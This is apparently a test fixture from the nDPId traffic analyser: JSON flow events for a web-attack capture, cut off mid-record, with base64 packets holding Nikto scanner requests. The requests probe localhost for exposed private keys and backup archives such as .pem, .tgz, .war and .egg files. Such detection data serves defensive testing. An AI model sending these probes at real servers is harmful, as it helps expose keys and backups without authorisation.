-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277079,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DWxAAEAGLs1\/AAABfwAAAcOYH5CSvzUdCWfTlYAYAED+sQAAAQEICp1m\/H+dZvx\/R0VUIC8xLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277081,"pkt":"AAAAAAAAAAAAAAAACABFAADDZbZAAEAG1nx\/AAABfwAAAcOaH5Ap5V3Dc4s2n4AYAED+twAAAQEICp1m\/IGdZvyBR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277083,"pkt":"AAAAAAAAAAAAAAAACABFAADDEYFAAEAGKrJ\/AAABfwAAAcOcH5DxxikK7qXr+IAYAED+twAAAQEICp1m\/IOdZvyCR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277084,"pkt":"AAAAAAAAAAAAAAAACABFAADFEhNAAEAGKh5\/AAABfwAAAcOeH5AvZipnVfZObIAYAED+uQAAAQEICp1m\/ISdZvyER0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277086,"pkt":"AAAAAAAAAAAAAAAACABFAADF4EhAAEAGW+h\/AAABfwAAAcOgH5AMu9gyVttcv4AYAED+uQAAAQEICp1m\/IadZvyGR0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277087,"pkt":"AAAAAAAAAAAAAAAACABFAADFByZAAEAGNQt\/AAABfwAAAcOiH5Ca4D9dxFiRCIAYAED+uQAAAQEICp1m\/IedZvyHR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277089,"pkt":"AAAAAAAAAAAAAAAACABFAADFHRdAAEAGHxp\/AAABfwAAAcOkH5BFAiVuc2g7y4AYAED+uQAAAQEICp1m\/ImdZvyJR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277090,"pkt":"AAAAAAAAAAAAAAAACABFAADCB4tAAEAGNKl\/AAABfwAAAcOmH5BcnD\/ywDswlIAYAED+tgAAAQEICp1m\/IqdZvyKR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277091,"pkt":"AAAAAAAAAAAAAAAACABFAADCHJtAAEAGH5l\/AAABfwAAAcOoH5BLfyTh3iqQcIAYAED+tgAAAQEICp1m\/IudZvyLR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277093,"pkt":"AAAAAAAAAAAAAAAACABFAADCo9lAAEAGmFp\/AAABfwAAAcOqH5B0iJuvJFRwg4AYAED+tgAAAQEICp1m\/IydZvyMR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277094,"pkt":"AAAAAAAAAAAAAAAACABFAADCBM1AAEAGN2d\/AAABfwAAAcOsH5CyHDyzBNbaOYAYAED+tgAAAQEICp1m\/I6dZvyOR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 